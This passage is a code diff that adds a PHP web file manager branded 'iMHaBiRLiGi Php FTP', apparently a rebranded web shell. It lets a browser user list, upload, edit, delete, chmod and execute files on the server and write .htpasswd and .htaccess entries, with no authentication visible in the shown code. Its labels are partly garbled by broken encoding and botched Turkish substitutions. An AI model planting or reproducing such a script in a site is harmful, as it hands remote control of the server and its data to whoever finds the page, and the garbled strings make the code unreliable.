+		echo "\n<b>" . word('Kopyala_files') . '</b>
+	<p>
+';
+
+		foreach ($files as $file) {
+			echo "\t" . html($file) . "<br />\n";
+		}
+
+		echo '	</p>
+	<hr />
+	' . word('Yol') . ':
+	<input type="text" name="Yol" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
+	<input type="submit" value="' . word('Kopyala') . '" />
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'create_symlink':
+
+	if (!empty($_POST['Yol'])) {
+
+		$dest = relative2absolute($_POST['Yol'], $directory);
+
+		if (substr($dest, -1, 1) == $delim) $dest .= basename($file);
+
+		if (!empty($_POST['relative'])) $file = absolute2relative(addslash(dirname($dest)), $file);
+
+		if (!@file_exists($dest) && @symlink($file, $dest)) {
+			listing_page(notice('symlinked', $file, $dest));
+		} else {
+			listing_page(error('not_symlinked', $file, $dest));
+		}
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog" id="symlink">
+<tr>
+	<td style="vertical-align: top">' . word('Yol') . ': </td>
+	<td>
+		<b>' . html($file) . '</b><br />
+		<input type="checkbox" name="relative" value="yes" id="checkbox_relative" checked="checked" style="margin-top: 1ex" />
+		<label for="checkbox_relative">' . word('relative') . '</label>
+		<input type="hidden" name="action" value="create_symlink" />
+		<input type="hidden" name="file" value="' . html($file) . '" />
+		<input type="hidden" name="dir" value="' . html($directory) . '" />
+	</td>
+</tr>
+<tr>
+	<td>' . word('symlink') . ': </td>
+	<td>
+		<input type="text" name="Yol" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
+		<input type="submit" value="' . word('create_symlink') . '" />
+	</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'D�zenle':
+
+	if (!empty($_POST['save'])) {
+
+		$content = str_replace("\r\n", "\n", $_POST['content']);
+
+		if (($f = @fopen($file, 'w')) && @fwrite($f, $content) !== false && @fclose($f)) {
+			listing_page(notice('saved', $file));
+		} else {
+			listing_page(error('not_saved', $file));
+		}
+
+	} else {
+
+		if (@is_readable($file) && @is_writable($file)) {
+			D�zenle($file);
+		} else {
+			listing_page(error('not_D�zenleed', $file));
+		}
+
+	}
+
+	break;
+
+case 'permission':
+
+	if (!empty($_POST['set'])) {
+
+		$mode = 0;
+		if (!empty($_POST['ur'])) $mode |= 0400; if (!empty($_POST['uw'])) $mode |= 0200; if (!empty($_POST['ux'])) $mode |= 0100;
+		if (!empty($_POST['gr'])) $mode |= 0040; if (!empty($_POST['gw'])) $mode |= 0020; if (!empty($_POST['gx'])) $mode |= 0010;
+		if (!empty($_POST['or'])) $mode |= 0004; if (!empty($_POST['ow'])) $mode |= 0002; if (!empty($_POST['ox'])) $mode |= 0001;
+
+		if (@chmod($file, $mode)) {
+			listing_page(notice('permission_set', $file, decoct($mode)));
+		} else {
+			listing_page(error('permission_not_set', $file, decoct($mode)));
+		}
+
+	} else {
+
+		html_header();
+
+		$mode = fileperms($file);
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+
+	<p style="margin: 0">' . phrase('permission_for', $file) . '</p>
+
+	<hr />
+
+	<table id="permission">
+	<tr>
+		<td></td>
+		<td style="border-right: 1px solid black">' . word('owner') . '</td>
+		<td style="border-right: 1px solid black">' . word('group') . '</td>
+		<td>' . word('other') . '</td>
+	</tr>
+	<tr>
+		<td style="text-align: right">' . word('read') . ':</td>
+		<td><input type="checkbox" name="ur" value="1"'; if ($mode & 00400) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="gr" value="1"'; if ($mode & 00040) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="or" value="1"'; if ($mode & 00004) echo ' checked="checked"'; echo ' /></td>
+	</tr>
+	<tr>
+		<td style="text-align: right">' . word('write') . ':</td>
+		<td><input type="checkbox" name="uw" value="1"'; if ($mode & 00200) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="gw" value="1"'; if ($mode & 00020) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="ow" value="1"'; if ($mode & 00002) echo ' checked="checked"'; echo ' /></td>
+	</tr>
+	<tr>
+		<td style="text-align: right">' . word('execute') . ':</td>
+		<td><input type="checkbox" name="ux" value="1"'; if ($mode & 00100) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="gx" value="1"'; if ($mode & 00010) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="ox" value="1"'; if ($mode & 00001) echo ' checked="checked"'; echo ' /></td>
+	</tr>
+	</table>
+
+	<hr />
+
+	<input type="submit" name="set" value="' . word('set') . '" />
+
+	<input type="hidden" name="action" value="permission" />
+	<input type="hidden" name="file" value="' . html($file) . '" />
+	<input type="hidden" name="dir" value="' . html($directory) . '" />
+
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+default:
+
+	listing_page();
+
+}
+
+/* ------------------------------------------------------------------------- */
+
+function getlist ($directory) {
+	global $delim, $win;
+
+	if ($d = @opendir($directory)) {
+
+		while (($filename = @readdir($d)) !== false) {
+
+			$path = $directory . $filename;
+
+			if ($stat = @lstat($path)) {
+
+				$file = array(
+					'filename'    => $filename,
+					'path'        => $path,
+					'is_file'     => @is_file($path),
+					'is_dir'      => @is_dir($path),
+					'is_link'     => @is_link($path),
+					'is_readable' => @is_readable($path),
+					'is_writable' => @is_writable($path),
+					'size'        => $stat['size'],
+					'permission'  => $stat['mode'],
+					'owner'       => $stat['uid'],
+					'group'       => $stat['gid'],
+					'mtime'       => @filemtime($path),
+					'atime'       => @fileatime($path),
+					'ctime'       => @filectime($path)
+				);
+
+				if ($file['is_dir']) {
+					$file['is_executable'] = @file_exists($path . $delim . '.');
+				} else {
+					if (!$win) {
+						$file['is_executable'] = @is_executable($path);
+					} else {
+						$file['is_executable'] = true;
+					}
+				}
+
+				if ($file['is_link']) $file['target'] = @readlink($path);
+
+				if (function_exists('posix_getpwuid')) $file['owner_name'] = @reset(posix_getpwuid($file['owner']));
+				if (function_exists('posix_getgrgid')) $file['group_name'] = @reset(posix_getgrgid($file['group']));
+
+				$files[] = $file;
+
+			}
+
+		}
+
+		return $files;
+
+	} else {
+		return false;
+	}
+
+}
+
+function sortlist (&$list, $key, $reverse) {
+
+	quicksort($list, 0, sizeof($list) - 1, $key);
+
+	if ($reverse) $list = array_reverse($list);
+
+}
+
+function quicksort (&$array, $first, $last, $key) {
+
+	if ($first < $last) {
+
+		$cmp = $array[floor(($first + $last) / 2)][$key];
+
+		$l = $first;
+		$r = $last;
+
+		while ($l <= $r) {
+
+			while ($array[$l][$key] < $cmp) $l++;
+			while ($array[$r][$key] > $cmp) $r--;
+
+			if ($l <= $r) {
+
+				$tmp = $array[$l];
+				$array[$l] = $array[$r];
+				$array[$r] = $tmp;
+
+				$l++;
+				$r--;
+
+			}
+
+		}
+
+		quicksort($array, $first, $r, $key);
+		quicksort($array, $l, $last, $key);
+
+	}
+
+}
+
+function permission_octal2string ($mode) {
+
+	if (($mode & 0xC000) === 0xC000) {
+		$type = 's';
+	} elseif (($mode & 0xA000) === 0xA000) {
+		$type = 'l';
+	} elseif (($mode & 0x8000) === 0x8000) {
+		$type = '-';
+	} elseif (($mode & 0x6000) === 0x6000) {
+		$type = 'b';
+	} elseif (($mode & 0x4000) === 0x4000) {
+		$type = 'd';
+	} elseif (($mode & 0x2000) === 0x2000) {
+		$type = 'c';
+	} elseif (($mode & 0x1000) === 0x1000) {
+		$type = 'p';
+	} else {
+		$type = '?';
+	}
+
+	$owner  = ($mode & 00400) ? 'r' : '-';
+	$owner .= ($mode & 00200) ? 'w' : '-';
+	if ($mode & 0x800) {
+		$owner .= ($mode & 00100) ? 's' : 'S';
+	} else {
+		$owner .= ($mode & 00100) ? 'x' : '-';
+	}
+
+	$group  = ($mode & 00040) ? 'r' : '-';
+	$group .= ($mode & 00020) ? 'w' : '-';
+	if ($mode & 0x400) {
+		$group .= ($mode & 00010) ? 's' : 'S';
+	} else {
+		$group .= ($mode & 00010) ? 'x' : '-';
+	}
+
+	$other  = ($mode & 00004) ? 'r' : '-';
+	$other .= ($mode & 00002) ? 'w' : '-';
+	if ($mode & 0x200) {
+		$other .= ($mode & 00001) ? 't' : 'T';
+	} else {
+		$other .= ($mode & 00001) ? 'x' : '-';
+	}
+
+	return $type . $owner . $group . $other;
+
+}
+
+function is_script ($filename) {
+	return ereg('\.php$|\.php3$|\.php4$|\.php5$', $filename);
+}
+
+function getmimetype ($filename) {
+	static $mimes = array(
+		'\.jpg$|\.jpeg$'  => 'image/jpeg',
+		'\.gif$'          => 'image/gif',
+		'\.png$'          => 'image/png',
+		'\.html$|\.html$' => 'text/html',
+		'\.txt$|\.asc$'   => 'text/plain',
+		'\.xml$|\.xsl$'   => 'application/xml',
+		'\.pdf$'          => 'application/pdf'
+	);
+
+	foreach ($mimes as $regex => $mime) {
+		if (eregi($regex, $filename)) return $mime;
+	}
+
+	// return 'application/octet-stream';
+	return 'text/plain';
+
+}
+
+function del ($file) {
+	global $delim;
+
+	if (!@is_link($file) && !file_exists($file)) return false;
+
+	if (!@is_link($file) && @is_dir($file)) {
+
+		if ($dir = @opendir($file)) {
+
+			$error = false;
+
+			while (($f = readdir($dir)) !== false) {
+				if ($f != '.' && $f != '..' && !del($file . $delim . $f)) {
+					$error = true;
+				}
+			}
+			closedir($dir);
+
+			if (!$error) return @rmdir($file);
+
+			return !$error;
+
+		} else {
+			return false;
+		}
+
+	} else {
+		return @unlink($file);
+	}
+
+}
+
+function addslash ($directory) {
+	global $delim;
+
+	if (substr($directory, -1, 1) != $delim) {
+		return $directory . $delim;
+	} else {
+		return $directory;
+	}
+
+}
+
+function relative2absolute ($string, $directory) {
+
+	if (path_is_relative($string)) {
+		return simplify_path(addslash($directory) . $string);
+	} else {
+		return simplify_path($string);
+	}
+
+}
+
+function path_is_relative ($path) {
+	global $win;
+
+	if ($win) {
+		return (substr($path, 1, 1) != ':');
+	} else {
+		return (substr($path, 0, 1) != '/');
+	}
+
+}
+
+function absolute2relative ($directory, $target) {
+	global $delim;
+
+	$path = '';
+	while ($directory != $target) {
+		if ($directory == substr($target, 0, strlen($directory))) {
+			$path .= substr($target, strlen($directory));
+			break;
+		} else {
+			$path .= '..' . $delim;
+			$directory = substr($directory, 0, strrpos(substr($directory, 0, -1), $delim) + 1);
+		}
+	}
+	if ($path == '') $path = '.';
+
+	return $path;
+
+}
+
+function simplify_path ($path) {
+	global $delim;
+
+	if (@file_exists($path) && function_exists('realpath') && @realpath($path) != '') {
+		$path = realpath($path);
+		if (@is_dir($path)) {
+			return addslash($path);
+		} else {
+			return $path;
+		}
+	}
+
+	$pattern  = $delim . '.' . $delim;
+
+	if (@is_dir($path)) {
+		$path = addslash($path);
+	}
+
+	while (strpos($path, $pattern) !== false) {
+		$path = str_replace($pattern, $delim, $path);
+	}
+
+	$e = addslashes($delim);
+	$regex = $e . '((\.[^\.' . $e . '][^' . $e . ']*)|(\.\.[^' . $e . ']+)|([^\.][^' . $e . ']*))' . $e . '\.\.' . $e;
+
+	while (ereg($regex, $path)) {
+		$path = ereg_replace($regex, $delim, $path);
+	}
+	
+	return $path;
+
+}
+
+function human_filesize ($filesize) {
+
+	$suffices = 'kMGTPE';
+
+	$n = 0;
+	while ($filesize >= 1000) {
+		$filesize /= 1024;
+		$n++;
+	}
+
+	$filesize = round($filesize, 3 - strpos($filesize, '.'));
+
+	if (strpos($filesize, '.') !== false) {
+		while (in_array(substr($filesize, -1, 1), array('0', '.'))) {
+			$filesize = substr($filesize, 0, strlen($filesize) - 1);
+		}
+	}
+
+	$suffix = (($n == 0) ? '' : substr($suffices, $n - 1, 1));
+
+	return $filesize . " {$suffix}B";
+
+}
+
+function strip (&$str) {
+	$str = stripslashes($str);
+}
+
+/* ------------------------------------------------------------------------- */
+
+function listing_page ($message = null) {
+	global $self, $directory, $sort, $reverse;
+
+	html_header();
+
+	$list = getlist($directory);
+
+	if (array_key_exists('sort', $_GET)) $sort = $_GET['sort']; else $sort = 'filename';
+	if (array_key_exists('reverse', $_GET) && $_GET['reverse'] == 'true') $reverse = true; else $reverse = false;
+
+	sortlist($list, $sort, $reverse);
+
+	echo '<h1 style="margin-bottom: 0">iMHaBiRLiGi Php FTP</h1>
+
+<form enctype="multipart/form-data" action="' . $self . '" method="post">
+
+<table id="main">
+';
+
+	directory_choice();
+
+	if (!empty($message)) {
+		spacer();
+		echo $message;
+	}
+
+	if (@is_writable($directory)) {
+		upload_box();
+		create_box();
+	} else {
+		spacer();
+	}
+
+	if ($list) {
+		listing($list);
+	} else {
+		echo error('not_readable', $directory);
+	}
+
+	echo '</table>
+
+</form>
+
+';
+
+	html_footer();
+
+}
+
+function listing ($list) {
+	global $directory, $homedir, $sort, $reverse, $win, $cols, $date_format, $self;
+
+	echo '<tr class="listing">
+	<th style="text-align: center; vertical-align: middle"><img src="' . $self . '?image=smiley" alt="smiley" /></th>
+';
+
+	$d = 'dir=' . urlencode($directory) . '&amp;';
+
+	if (!$reverse && $sort == 'filename') $r = '&amp;reverse=true'; else $r = '';
+	echo "\t<th class=\"filename\"><a href=\"$self?{$d}sort=filename$r\">" . word('filename') . "</a></th>\n";
+
+	if (!$reverse && $sort == 'size') $r = '&amp;reverse=true'; else $r = '';
+	echo "\t<th class=\"size\"><a href=\"$self?{$d}sort=size$r\">" . word('size') . "</a></th>\n";
+
+	if (!$win) {
+
+		if (!$reverse && $sort == 'permission') $r = '&amp;reverse=true'; else $r = '';
+		echo "\t<th class=\"permission_header\"><a href=\"$self?{$d}sort=permission$r\">" . word('permission') . "</a></th>\n";
+
+		if (!$reverse && $sort == 'owner') $r = '&amp;reverse=true'; else $r = '';
+		echo "\t<th class=\"owner\"><a href=\"$self?{$d}sort=owner$r\">" . word('owner') . "</a></th>\n";
+
+		if (!$reverse && $sort == 'group') $r = '&amp;reverse=true'; else $r = '';
+		echo "\t<th class=\"group\"><a href=\"$self?{$d}sort=group$r\">" . word('group') . "</a></th>\n";
+
+	}
+
+	echo '	<th class="G�revler">' . word('G�revler') . '</th>
+</tr>
+';
+
+	for ($i = 0; $i < sizeof($list); $i++) {
+		$file = $list[$i];
+
+		$timestamps  = 'mtime: ' . date($date_format, $file['mtime']) . ', ';
+		$timestamps .= 'atime: ' . date($date_format, $file['atime']) . ', ';
+		$timestamps .= 'ctime: ' . date($date_format, $file['ctime']);
+
+		echo '<tr class="listing">
+	<td class="checkbox"><input type="checkbox" name="checked' . $i . '" value="true" onfocus="activate(\'other\')" /></td>
+	<td class="filename" title="' . html($timestamps) . '">';
+
+		if ($file['is_link']) {
+
+			echo '<img src="' . $self . '?image=link" alt="link" /> ';
+			echo html($file['filename']) . ' &rarr; ';
+
+			$real_file = relative2absolute($file['target'], $directory);
+
+			if (@is_readable($real_file)) {
+				if (@is_dir($real_file)) {
+					echo '[ <a href="' . $self . '?dir=' . urlencode($real_file) . '">' . html($file['target']) . '</a> ]';
+				} else {
+					echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($real_file) . '">' . html($file['target']) . '</a>';
+				}
+			} else {
+				echo html($file['target']);
+			}
+
+		} elseif ($file['is_dir']) {
+
+			echo '<img src="' . $self . '?image=folder" alt="folder" /> [ ';
+			if ($win || $file['is_executable']) {
+				echo '<a href="' . $self . '?dir=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
+			} else {
+				echo html($file['filename']);
+			}
+			echo ' ]';
+
+		} else {
+
+			if (substr($file['filename'], 0, 1) == '.') {
+				echo '<img src="' . $self . '?image=hidden_file" alt="hidden file" /> ';
+			} else {
+				echo '<img src="' . $self . '?image=file" alt="file" /> ';
+			}
+
+			if ($file['is_file'] && $file['is_readable']) {
+			   echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
+			} else {
+				echo html($file['filename']);
+			}
+
+		}
+
+		if ($file['size'] >= 1000) {
+			$human = ' title="' . human_filesize($file['size']) . '"';
+		} else {
+			$human = '';
+		}
+
+		echo "\t<td class=\"size\"$human>{$file['size']} B</td>\n";
+
+		if (!$win) {
+
+			echo "\t<td class=\"permission\" title=\"" . decoct($file['permission']) . '">';
+
+			$l = !$file['is_link'] && (!function_exists('posix_getuid') || $file['owner'] == posix_getuid());
+			if ($l) echo '<a href="' . $self . '?action=permission&amp;file=' . urlencode($file['path']) . '&amp;dir=' . urlencode($directory) . '">';
+			echo html(permission_octal2string($file['permission']));
+			if ($l) echo '</a>';
+
+			echo "</td>\n";
+
+			if (array_key_exists('owner_name', $file)) {
+				echo "\t<td class=\"owner\" title=\"uid: {$file['owner']}\">{$file['owner_name']}</td>\n";
+			} else {
+				echo "\t<td class=\"owner\">{$file['owner']}</td>\n";
+			}
+
+			if (array_key_exists('group_name', $file)) {
+				echo "\t<td class=\"group\" title=\"gid: {$file['group']}\">{$file['group_name']}</td>\n";
+			} else {
+				echo "\t<td class=\"group\">{$file['group']}</td>\n";
+			}
+
+		}
+
+		echo '	<td class="G�revler">
+		<input type="hidden" name="file' . $i . '" value="' . html($file['path']) . '" />
+';
+
+		$actions = array();
+		if (function_exists('symlink')) {
+			$actions[] = 'create_symlink';
+		}
+		if (@is_writable(dirname($file['path']))) {
+			$actions[] = 'Sil';
+			$actions[] = 'Degistir';
+			$actions[] = 'Tasi';
+		}
+		if ($file['is_file'] && $file['is_readable']) {
+			$actions[] = 'Kopyala';
+			$actions[] = 'indir';
+			if ($file['is_writable']) $actions[] = 'D�zenle';
+		}
+		if (!$win && function_exists('exec') && $file['is_file'] && $file['is_executable'] && file_exists('/bin/sh')) {
+			$actions[] = 'execute';
+		}
+
+		if (sizeof($actions) > 0) {
+
+			echo '		<select class="small" name="action' . $i . '" size="1">
+		<option value="">' . str_repeat('&nbsp;', 30) . '</option>
+';
+
+			foreach ($actions as $action) {
+				echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
+			}
+
+			echo '		</select>
+		<input class="small" type="submit" name="submit' . $i . '" value=" &gt; " onfocus="activate(\'other\')" />
+';
+
+		}
+
+		echo '	</td>
+</tr>
+';
+
+	}
+
+	echo '<tr class="listing_footer">
+	<td style="text-align: right; vertical-align: top"><img src="' . $self . '?image=arrow" alt="&gt;" /></td>
+	<td colspan="' . ($cols - 1) . '">
+		<input type="hidden" name="num" value="' . sizeof($list) . '" />
+		<input type="hidden" name="focus" value="" />
+		<input type="hidden" name="olddir" value="' . html($directory) . '" />
+';
+
+	$actions = array();
+	if (@is_writable(dirname($file['path']))) {
+		$actions[] = 'Sil';
+		$actions[] = 'Tasi';
+	}
+	$actions[] = 'Kopyala';
+
+	echo '		<select class="small" name="action_all" size="1">
+		<option value="">' . str_repeat('&nbsp;', 30) . '</option>
+';
+
+	foreach ($actions as $action) {
+		echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
+	}
+
+	echo '		</select>
+		<input class="small" type="submit" name="submit_all" value=" &gt; " onfocus="activate(\'other\')" />
+	</td>
+</tr>
+';
+
+}
+
+function directory_choice () {
+	global $directory, $homedir, $cols, $self;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" id="directory">
+		<a href="' . $self . '?dir=' . urlencode($homedir) . '">' . word('directory') . '</a>:
+		<input type="text" name="dir" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" onfocus="activate(\'directory\')" />
+		<input type="submit" name="changedir" value="' . word('change') . '" onfocus="activate(\'directory\')" />
+	</td>
+</tr>
+';
+
+}
+
+function upload_box () {
+	global $cols;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" id="upload">
+		' . word('file') . ':
+		<input type="file" name="upload" onfocus="activate(\'other\')" />
+		<input type="submit" name="submit_upload" value="' . word('upload') . '" onfocus="activate(\'other\')" />
+	</td>
+</tr>
+';
+
+}
+
+function create_box () {
+	global $cols;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" id="create">
+		<select name="create_type" size="1" onfocus="activate(\'create\')">
+		<option value="file">' . word('file') . '</option>
+		<option value="directory">' . word('directory') . '</option>
+		</select>
+		<input type="text" name="create_name" onfocus="activate(\'create\')" />
+		<input type="submit" name="submit_create" value="' . word('create') . '" onfocus="activate(\'create\')" />
+	</td>
+</tr>
+';
+
+}
+
+function D�zenle ($file) {
+	global $self, $directory, $D�zenlecols, $D�zenlerows, $apache, $htpasswd, $htaccess;
+
+	html_header();
+
+	echo '<h2 style="margin-bottom: 3pt">' . html($file) . '</h2>
+
+<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+
+	<textarea name="content" cols="' . $D�zenlecols . '" rows="' . $D�zenlerows . '" WRAP="off">';
+
+	if (array_key_exists('content', $_POST)) {
+		echo $_POST['content'];
+	} else {
+		$f = fopen($file, 'r');
+		while (!feof($f)) {
+			echo html(fread($f, 8192));
+		}
+		fclose($f);
+	}
+
+	if (!empty($_POST['user'])) {
+		echo "\n" . $_POST['user'] . ':' . crypt($_POST['password']);
+	}
+	if (!empty($_POST['basic_auth'])) {
+		if ($win) {
+			$authfile = str_replace('\\', '/', $directory) . $htpasswd;
+		} else {
+			$authfile = $directory . $htpasswd;
+		}
+		echo "\nAuthType Basic\nAuthName &quot;Restricted Directory&quot;\n";
+		echo 'AuthUserFile &quot;' . html($authfile) . "&quot;\n";
+		echo 'Require valid-user';
+	}
+
+	echo '</textarea>
+
+	<hr />
+';
+
+	if ($apache && basename($file) == $htpasswd) {
+		echo '
+	' . word('user') . ': <input type="text" name="user" />
+	' . word('password') . ': <input type="password" name="password" />
+	<input type="submit" value="' . word('add') . '" />
+
+	<hr />
+';
+
+	}
+
+	if ($apache && basename($file) == $htaccess) {
+		echo '
+	<input type="submit" name="basic_auth" value="' . word('add_basic_auth') . '" />
+
+	<hr />
+';
+
+	}
+
+	echo '
+	<input type="hidden" name="action" value="D�zenle" />
+	<input type="hidden" name="file" value="' . html($file) . '" />
+	<input type="hidden" name="dir" value="' . html($directory) . '" />
+	<input type="reset" value="' . word('reset') . '" id="red_button" />
+	<input type="submit" name="save" value="' . word('save') . '" id="green_button" style="margin-left: 50px" />
+
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+	html_footer();
+
+}
+
+function spacer () {
+	global $cols;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" style="height: 1em"></td>
+</tr>
+';
+
+}
+
+function textfieldsize ($content) {
+
+	$size = strlen($content) + 5;
+	if ($size < 30) $size = 30;
+
+	return $size;
+
+}
+
+function request_dump () {
+
+	foreach ($_REQUEST as $key => $value) {
+		echo "\t<input type=\"hidden\" name=\"" . html($key) . '" value="' . html($value) . "\" />\n";
+	}
+
+}
+
+/* ------------------------------------------------------------------------- */
+
+function html ($string) {
+	global $charset;
+	return htmlentities($string, ENT_COMPAT, $charset);
+}
+
+function word ($word) {
+	global $words, $word_charset;
+	return htmlentities($words[$word], ENT_COMPAT, $word_charset);
+}
+
+function phrase ($phrase, $arguments) {
+	global $words;
+	static $search;
+
+	if (!is_array($search)) for ($i = 1; $i <= 8; $i++) $search[] = "%$i";
+
+	for ($i = 0; $i < sizeof($arguments); $i++) {
+		$arguments[$i] = nl2br(html($arguments[$i]));
+	}
+
+	$replace = array('{' => '<pre>', '}' =>'</pre>', '[' => '<b>', ']' => '</b>');
+
+	return str_replace($search, $arguments, str_replace(array_keys($replace), $replace, nl2br(html($words[$phrase]))));
+
+}
+
+function getwords ($lang) {
+	global $word_charset, $date_format;
+
+	switch ($lang) {
+	case 'de':
+
+		$date_format = 'd.m.y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Verzeichnis',
+'file' => 'Datei',
+'filename' => 'Dateiname',
+
+'size' => 'Gr��e',
+'permission' => 'Rechte',
+'owner' => 'Eigner',
+'group' => 'Gruppe',
+'other' => 'Andere',
+'G�revler' => 'Funktionen',
+
+'read' => 'lesen',
+'write' => 'schreiben',
+'execute' => 'ausf�hren',
+
+'create_symlink' => 'Symlink erstellen',
+'Sil' => 'l�schen',
+'Degistir' => 'umbenennen',
+'Tasi' => 'verschieben',
+'Kopyala' => 'kopieren',
+'D�zenle' => 'D�zenleieren',
+'indir' => 'herunterladen',
+'upload' => 'hochladen',
+'create' => 'erstellen',
+'change' => 'wechseln',
+'save' => 'speichern',
+'set' => 'setze',
+'reset' => 'zur�cksetzen',
+'relative' => 'Pfad zum Ziel relativ',
+
+'yes' => 'Ja',
+'no' => 'Nein',
+'Geri' => 'zur�ck',
+'Yol' => 'Ziel',
+'symlink' => 'Symbolischer Link',
+'no_output' => 'keine Ausgabe',
+
+'user' => 'Benutzername',
+'password' => 'Kennwort',
+'add' => 'hinzuf�gen',
+'add_basic_auth' => 'HTTP-Basic-Auth hinzuf�gen',
+
+'uploaded' => '"[%1]" wurde hochgeladen.',
+'not_uploaded' => '"[%1]" konnte nicht hochgeladen werden.',
+'already_exists' => '"[%1]" existiert bereits.',
+'created' => '"[%1]" wurde erstellt.',
+'not_created' => '"[%1]" konnte nicht erstellt werden.',
+'really_Sil' => 'Sollen folgende Dateien wirklich gel�scht werden?',
+'Sild' => "Folgende Dateien wurden gel�scht:\n[%1]",
+'not_Sild' => "Folgende Dateien konnten nicht gel�scht werden:\n[%1]",
+'Degistir_file' => 'Benenne Datei um:',
+'Degistird' => '"[%1]" wurde in "[%2]" umbenannt.',
+'not_Degistird' => '"[%1] konnte nicht in "[%2]" umbenannt werden.',
+'Tasi_files' => 'Verschieben folgende Dateien:',
+'Tasid' => "Folgende Dateien wurden nach \"[%2]\" verschoben:\n[%1]",
+'not_Tasid' => "Folgende Dateien konnten nicht nach \"[%2]\" verschoben werden:\n[%1]",
+'Kopyala_files' => 'Kopiere folgende Dateien:',
+'copied' => "Folgende Dateien wurden nach \"[%2]\" kopiert:\n[%1]",
+'not_copied' => "Folgende Dateien konnten nicht nach \"[%2]\" kopiert werden:\n[%1]",
+'not_D�zenleed' => '"[%1]" kann nicht D�zenleiert werden.',
+'executed' => "\"[%1]\" wurde erfolgreich ausgef�hrt:\n{%2}",
+'not_executed' => "\"[%1]\" konnte nicht erfolgreich ausgef�hrt werden:\n{%2}",
+'saved' => '"[%1]" wurde gespeichert.',
+'not_saved' => '"[%1]" konnte nicht gespeichert werden.',
+'symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" wurde erstellt.',
+'not_symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" konnte nicht erstellt werden.',
+'permission_for' => 'Rechte f�r "[%1]":',
+'permission_set' => 'Die Rechte f�r "[%1]" wurden auf [%2] gesetzt.',
+'permission_not_set' => 'Die Rechte f�r "[%1]" konnten nicht auf [%2] gesetzt werden.',
+'not_readable' => '"[%1]" kann nicht gelesen werden.'
+		);
+
+	case 'fr':
+
+		$date_format = 'd.m.y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'R�pertoire',
+'file' => 'Fichier',
+'filename' => 'Nom fichier',
+
+'size' => 'Taille',
+'permission' => 'Droits',
+'owner' => 'Propri�taire',
+'group' => 'Groupe',
+'other' => 'Autres',
+'G�revler' => 'Fonctions',
+
+'read' => 'Lire',
+'write' => 'Ecrire',
+'execute' => 'Ex�cuter',
+
+'create_symlink' => 'Cr�er lien symbolique',
+'Sil' => 'Effacer',
+'Degistir' => 'Renommer',
+'Tasi' => 'D�placer',
+'Kopyala' => 'Copier',
+'D�zenle' => 'Ouvrir',
+'indir' => 'T�l�charger sur PC',
+'upload' => 'T�l�charger sur serveur',
+'create' => 'Cr�er',
+'change' => 'Changer',
+'save' => 'Sauvegarder',
+'set' => 'Ex�cuter',
+'reset' => 'R�initialiser',
+'relative' => 'Relatif',
+
+'yes' => 'Oui',
+'no' => 'Non',
+'Geri' => 'Retour',
+'Yol' => 'Yol',
+'symlink' => 'Lien symbollique',
+'no_output' => 'Pas de sortie',
+
+'user' => 'Utilisateur',
+'password' => 'Mot de passe',
+'add' => 'Ajouter',
+'add_basic_auth' => 'add basic-authentification',
+
+'uploaded' => '"[%1]" a �t� t�l�charg� sur le serveur.',
+'not_uploaded' => '"[%1]" n a pas �t� t�l�charg� sur le serveur.',
+'already_exists' => '"[%1]" existe d�j�.',
+'created' => '"[%1]" a �t� cr��.',
+'not_created' => '"[%1]" n a pas pu �tre cr��.',
+'really_Sil' => 'Effacer le fichier?',
+'Sild' => "Ces fichiers ont �t� d�tuits:\n[%1]",
+'not_Sild' => "Ces fichiers n ont pu �tre d�truits:\n[%1]",
+'Degistir_file' => 'Renomme fichier:',
+'Degistird' => '"[%1]" a �t� renomm� en "[%2]".',
+'not_Degistird' => '"[%1] n a pas pu �tre renomm� en "[%2]".',
+'Tasi_files' => 'D�placer ces fichiers:',
+'Tasid' => "Ces fichiers ont �t� d�plac�s en \"[%2]\":\n[%1]",
+'not_Tasid' => "Ces fichiers n ont pas pu �tre d�plac�s en \"[%2]\":\n[%1]",
+'Kopyala_files' => 'Copier ces fichiers:',
+'copied' => "Ces fichiers ont �t� copi�s en \"[%2]\":\n[%1]",
+'not_copied' => "Ces fichiers n ont pas pu �tre copi�s en \"[%2]\":\n[%1]",
+'not_D�zenleed' => '"[%1]" ne peut �tre ouvert.',
